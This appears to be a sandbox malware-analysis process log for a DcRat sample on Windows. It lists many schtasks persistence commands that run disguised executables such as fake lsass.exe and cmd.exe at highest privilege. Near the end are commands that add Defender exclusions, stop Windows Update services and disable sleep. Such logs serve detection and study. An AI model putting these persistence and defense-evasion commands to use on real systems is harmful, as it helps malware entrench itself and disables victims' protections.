C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5960
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵PID:1804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Pictures\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Documents\My Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵
- Process spawned unexpected child process
PID:6084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /f1⤵PID:1472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:5224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /rl HIGHEST /f1⤵PID:5372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /f1⤵PID:5276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\cmd.exe'" /rl HIGHEST /f1⤵PID:5388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2308
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵PID:2588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 8 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\wscript.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:1600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 8 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:5980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /f1⤵PID:2956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:2888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /rl HIGHEST /f1⤵PID:5312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /f1⤵
- DcRat
PID:6100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 12 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe'" /rl HIGHEST /f1⤵PID:3860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /f1⤵PID:1368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 7 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3596
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\conhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵PID:4980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:4464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\conhost.exe'" /rl HIGHEST /f1⤵PID:628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\wscript.exe'" /rl HIGHEST /f1⤵PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\conhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 6 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /f1⤵PID:764
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f1⤵PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Desktop\conhost.exe'" /rl HIGHEST /f1⤵PID:4380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f1⤵PID:3684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:1816
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f1⤵PID:3360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 5 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:3916
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 9 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵PID:4048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /f1⤵PID:6196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:6248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /rl HIGHEST /f1⤵PID:6312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 14 /tr "'C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\CrackLauncher.exe'" /f1⤵
- DcRat
PID:6644
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Update\Offline\cmd.exe'" /rl HIGHEST /f1⤵PID:6712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:6832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\CrackLauncher.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:6904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:4520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 7 /tr "'C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\conhost.exe'" /f1⤵
- DcRat
PID:6284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AtomicHunterA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\AtomicHunter.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:2428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\conhost.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:4360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\ja-JP\lsass.exe'" /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AtomicHunter" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\AtomicHunter.exe'" /rl HIGHEST /f1⤵PID:2240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\wininit.exe'" /f1⤵PID:4056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\ja-JP\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:6572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AtomicHunterA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\AtomicHunter.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\wininit.exe'" /rl HIGHEST /f1⤵PID:6652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\ja-JP\lsass.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6564
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\reviewNet.exe'" /f1⤵PID:4984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\wininit.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:6808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\reviewNet.exe'" /rl HIGHEST /f1⤵PID:4928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Application Data\cmd.exe'" /f1⤵
- DcRat
PID:4948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\ComsurrogateServerdll\cmd.exe'" /f1⤵
- DcRat
PID:6972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:7036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 8 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /f1⤵PID:6164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\cmd.exe'" /rl HIGHEST /f1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\cmd.exe'" /rl HIGHEST /f1⤵PID:5684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncher" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\ComsurrogateServerdll\cmd.exe'" /rl HIGHEST /f1⤵PID:4776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "CrackLauncherC" /sc MINUTE /mo 13 /tr "'C:\ComsurrogateServerdll\CrackLauncher.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4524
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\SoftwareDistribution\DataStore\smss.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:7148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\reviewNet.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNet" /sc ONLOGON /tr "'C:\Users\Public\Downloads\reviewNet.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:5332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\DataStore\smss.exe'" /rl HIGHEST /f1⤵PID:5284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reviewNetr" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\reviewNet.exe'" /rl HIGHEST /f1⤵
- DcRat
PID:3740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Windows\SoftwareDistribution\DataStore\smss.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:3236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Windows\DigitalLocker\es-ES\cmd.exe'" /f1⤵
- DcRat
PID:5428
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1485325698-5948290031859998328-1528393381626392092216908731-1696298834-974299828"1⤵PID:6472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\es-ES\cmd.exe'" /rl HIGHEST /f1⤵PID:4732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Windows\DigitalLocker\es-ES\cmd.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:6092
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "210273578227321491815121121-1224688468-1309610432-1786795605-1468327361240319924"1⤵PID:2520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵
- Scheduled Task/Job: Scheduled Task
PID:4436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1807382920319628346176751268-23452078-4171568191169206738885765475-1877224400"1⤵PID:5060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\ComsurrogateServerdll\conhost.exe'" /rl HIGHEST /f1⤵PID:3868
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "576896792-790028612187096329-24148455-1732920522-20017761521427169960-966716183"1⤵PID:1588
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13108549171177278526-1614146342-312136801-6869655501581427390-1581274297-2014499822"1⤵PID:2152
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-7518683001308945446-826185816-45333792-1694623851-4508581581142091451926263874"1⤵PID:3124
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-409630333-650634532549022811261809057742361316-145273371621411397371652132368"1⤵PID:3792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "349818093-283326426-3850142711893723763-1708184793100661003615293600421155543181"1⤵PID:3120
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1055882789943657146638058252-312747958-561051315-15656256557227724071722812504"1⤵PID:1560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1178859056-178316166516845426201455751030-13970644061895443450-5705011091540731686"1⤵PID:3336
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "440732488381483323-1247878223-14339697954365195111478573526-1484061845806120125"1⤵PID:2248
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1110438001643485439-5604723781708392965-2130052399-157382947-1982729842-1620501525"1⤵PID:3252
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1232106113-813038452993135205-792506833-1913922661-1103440940-1564641914-568173707"1⤵PID:3080
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1444267163-487040664-8154520441034784716-174599101720775825881993202977-1778190403"1⤵PID:4776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Command and Scripting Interpreter: PowerShell
PID:5316
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:2000
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:7436 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5956 -
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:2104 -
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:3680 -
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:6904
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵
- Power Settings
PID:1040 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:5424 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:8124 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵
- Power Settings
PID:1308 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3052
-
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6080
-
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-857862568-21368953955582549-172706941-1700531971402775487908720203441274968"
1⤵
PID:3700
-
C:\Windows\System32\schtasks.exe
